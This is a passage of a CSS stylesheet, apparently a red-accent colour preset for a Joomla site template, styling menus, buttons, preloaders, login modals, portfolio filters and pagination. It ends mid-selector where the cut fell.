#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  -webkit-transition: all .4s ease;
  -moz-transition: all .4s ease;
  -o-transition: all .4s ease;
  transition: all .4s ease;
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(241,72,51,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #b21f0c;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #f14833;
}
.sp-module ul.accordion-menu li.current > a {
  color: #f14833;
}
.nav.menu li.current > a {
  color: #f14833;
}
.close-offcanvas:hover {
  border: 1px solid #f14833;
  color: #f14833;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
a {
  color: #f14833;
}
a:hover {
  color: #e2270f;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dt >span.fas,
.article-info >dd >i,
.article-info >dd >span.fa,
.article-info >dd >span.fas {
  color: #f47363;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #f47363;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #ef331b;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #e2270f;
}
#offcanvas-toggler >i {
  color: #f47363;
}
#offcanvas-toggler >i:hover {
  color: #f14833;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.7);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #f14833;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #f14833;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #f14833;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(241,72,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #f14833;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(241,72,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #f14833;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(241,72,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(241,72,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #f14833;
}
.sp-pre-loader .wave-two li {
  background-color: #f14833;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#f14833,#f14833) 0 50%, linear-gradient(#f14833,#f14833) 0.625em 50%, linear-gradient(#f14833,#f14833) 1.25em 50%, linear-gradient(#f14833,#f14833) 1.875em 50%, linear-gradient(#f14833,#f14833) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #f14833;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #f14833;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(241,72,51,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(241,72,51,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #f35d4b;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #e2270f;
  border: 2px solid #f14833 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #e2270f;
  border-bottom-color: #f14833;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #f14833;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #f47363;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #f14833;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #f47363;
}
.light >i {
  color: #f9b3aa;
}
.light:hover i {
  color: #fbc8c2;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fbc8c2;
}
.login .title i.pe,
.registration .title i.pe {
  color: #f89e92;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #f14833 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #f14833 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(241,72,51,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #f35d4b;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #d8250f;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #d8250f;
}
.sp-contact-info li a:hover {
  color: #f6887b;
}
.sp-contact-info li i {
  color: #f6887b;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #f89e92;
}
ol.breadcrumb li a:hover {
  color: #f9b3aa;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #f14833;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #f9b3aa;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #f35d4b;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #f89e92;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #f47363 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #f9b3aa !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #f14833;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #f47363;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #f89e92;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #f89e92;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #f14833;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #f35d4b;
  border-color: #f14833;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #f14833;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #f35d4b;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #fcdeda;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #f14833;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fas,
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.far {
  color: #f14833;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fas,
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.far {
  color: #f47363;
}
input[type="text"]:focus {
  border: 1px solid #f14833;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #f14833;
}
.search:before {
  color: #f47363;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #f14833;
}
.post-format-masonry > i {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.7);
}
.post-format {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
.entry-link,
.entry-quote {
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
}
blockquote {
  border-color: #f14833;
}
.sp-comingsoon body {
  background-color: #ef331b;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #f14833;
  background-color: #f14833;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #f14833;
  background-color: #f14833;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #f47363;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #f14833;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #f47363;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #f14833;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #f14833;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #f14833;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #f14833;
}
.entry-header h1:after,
